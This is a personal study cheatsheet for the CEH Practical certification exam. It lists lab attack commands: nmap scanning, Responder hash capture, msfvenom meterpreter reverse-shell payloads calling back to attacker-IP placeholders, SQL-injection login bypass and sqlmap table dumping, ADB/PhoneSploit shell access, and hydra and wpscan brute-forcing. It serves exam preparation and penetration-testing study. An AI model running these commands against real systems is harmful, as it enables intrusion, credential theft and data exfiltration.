Successfully completed the CEH (Practical) exam by EC-Council with a score of 20/20! Took me around 2 hours 20 minutes to complete the 6 hour Proctored exam.
Just a typical CTF Player/Hacker going back to Basics 💻
My Personal Notes that I used on the Exam as a Cheatsheet
Netdiscover
- Scan Entire Network for ALive host using ARP
netdiscover -i eth0
netdiscover -r x.x.x.1/24
Nmap
- To scan the live Host
nmap -sP x.x.x.1/24
nmap -sn x.x.x.1/24
- To find the Specific open port
nmap -p port x.x.x.1/24 --open
- To find the OS
nmap -O x.x.x.x
- Comprehensive Scan
nmap -Pn -A x.x.x.1/24 -vv --open
Wireshark
- Wireshark provides the feature of reassembling a stream of plain text protocol packets into a human-readable format
select_packet > follow > TCP Stream
- To the get the specific method like ( post , get )
http.request.method==post
http.request.method==get
- To the Find DOS & DDOS
- go to Statistics and Select Conversations , sort by packets in IPv4 based on number of Packets transfer
Statistics > Conversations > IPv4 > Packets
Covert TCP
- covert_TCP
- In this we have to use Covert TCP technique to analyses the pcapng file.
- Traverse though each line in Wireshark and concentrate on Identification field, keep an eye on Hex value and ANSI value.
- Compile the Code
cc -o covert_tcp covert_tcp.c
- Reciever Machine(Client_IP)
sudo ./covert_tcp -dest Client_IP -source Attacker_IP -source_port 9999 -dest_port 8888 -server -file recieve.txt
- Sender Machine(Attacker_IP)
- Create A Message file that need to be transferred Eg: secret.txt
sudo ./covert_tcp -dest Client_IP -source Attacker_IP -source_port 8888 -dest_port 9999 -file secret.txt
- Secret message sent using Covert_TCP and it is captured using Wireshark - Pcap_of_Covert
- The Secret text is -> Hello This 123 -
LLMNR/NBT
-
Responder - rogue authentication server to capture hashes.
-
This can be used to get the already logged-in user's password, who is trying to access a shared resource which is not present.
-
In Parrot/Kali OS,
responder -I eth0
- In windows, try to access the shared resource, logs are stored at usr/share/responder/logs/SMB
- To crack that hash, use JohntheRipper
john SMBfilename
Port Login
- FTP Login
ftp x.x.x.x
- SSH Login
- TELNET Login
telnet x.x.x.x
Nslookup
- To verify Website's Ip
Nslookup wwww.example.com
File Upload
- To create a PHP Payload
- Copy the PHP code and create a .php
msfvenom -p php/meterpreter/reverse_tcp lhost=attacker-ip lport=attcker-port -f raw
- To create a Reverse_tcp Connection
msfconsole
use exploit/multi/handler
set payload php/meterepreter/reverse_tcp
set LHOST = attacker-ip
set LPORT = attcker-port
run
- To find the secret file
type C:\wamp64\www\DVWA\hackable\uploads\Hash.txt
SQL Injection
- Login bypass with [' or 1=1 --]
-
Damn Small SQLi Scanner (DSSS) is a fully functional SQL injection vulnerability scanner (supporting GET and POST parameters)
-
As of optional settings it supports HTTP proxy together with HTTP header values User-Agent, Referer and Cookie.
python3 dsss.py -u "url" --cookie="cookie"
- Open the binded URL
- List databases, add cookie values
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” --dbs
- OR
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” --data="id=1&Submit=Submit" --dbs
- List Tables, add databse name
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” -D database_name --tables
- List Columns of that table
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” -D database_name -T target_Table --columns
- Dump all values of the table
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” -D database_name -T target_Table --dump
System
- To create a Payload
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=attacker_IP LPORT=attacker_Port -o filename.exe
- To take a reverse TCP connection from windows
msfdb init && msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST= attacker-IP
set LPORT= attacker-Port
run
ADB
- To Install ADB
apt-get update
sudo apt-get install adb -y
adb devices -l
- Connection Establish Steps
adb connect x.x.x.x:5555
adb devices -l
adb shell
- To navigate
pwd
ls
cd Download
ls
cd sdcard
- Download a File from Android using ADB tool
adb pull /sdcard/log.txt C:\Users\admin\Desktop\log.txt
adb pull sdcard/log.txt /home/mmurphy/Desktop
PhoneSploit
- To install Phonesploit
git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
OR
python3 -m pip install colorama
- To run Phonesploit
python3 phonesploit.py
- Type 3 and Press Enter to Connect a new Phone OR Enter IP of Android Device
- Type 4, to Access Shell on phone
- Download File using PhoneSploit
9. Pull Folders from Phone to PC
- Enter the Full Path of file to Download
sdcard/Download/secret.txt
Wpscan
- Wordpress site only Users Enumeration
wpscan --url http://example.com/ceh --enumerate u
- Direct crack if we have user/password detail
wpscan --url http://x.x.x.x/wordpress/ -U users.txt -P /usr/share/wordlists/rockyou.txt
wpscan --url http://x.x.x.x:8080/CEH -u <user> -P ~/wordlists/password.txt
Hydra
hydra -l username -P passlist.txt x.x.x.x ssh
hydra -L userlist.txt -P passlist.txt ftp://x.x.x.x
- If the service isn't running on the default port, use -s
hydra -L userlist.txt -P passlist.txt ftp://x.x.x.x -s 221
- FTP Get command
- Used to download the specific file from FTP to attacker or local machine
get flag.txt ~/Desktop/filepath/flag.txt
get flag.txt .
hydra -l admin -P passlist.txt -o test.txt x.x.x.x telnet
Snow
- Whitespace Steganography using Snow
- To hide the Text
SNOW.EXE -C -p test -m "Secret Message" original.txt hide.txt
- To unhide the Hidden Text
SNOW.EXE -C -p test hide.txt
HashCalc
- HashCalc Interface.
- Create a text file.
- Choose text file.
- Hash Value of text file.
- Modify the text inside the file.
- Compare the hash, It will vary.
HashMyFile
- HashMyFile Application
- add folder to Hash the file presented in Folder
- After Hash the file
- Add More Hashing Format
MD5 Calculator
## MD5 Calculator
- Create a text file contains "Hello" and save it, Right click the file to compare hash.
- MD5 Hash of text file
Keywords
- Img hidden - Openstego
- .hex - Cryptool
- Whitespace - SNOW
- MD5 - Hashcalc & MD5 Calculator
- Encoded - BCTexteditor
- Volume & mount - Veracrypt
File Transfer
- used to send a payload by Apache
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /root/Desktop/filename /var/www/html/share/
- to start and verify
service apache2 start
service apache2 status
- to Download from Windows
- Open browser
IP_OF_LINUX/share
- File system > Network > smb///IP_OF_WINDOWS
Course
- Penetration Testing Student - PTS from INE
- Practical Ethical Hacking - PEH from TCM Security
- iLab CEH (Practical) Official Lab from EC-Council
- Youtube free iLab
TryHackMe
Final Words: Grab a cup of Tea ☕ and GRIND!!!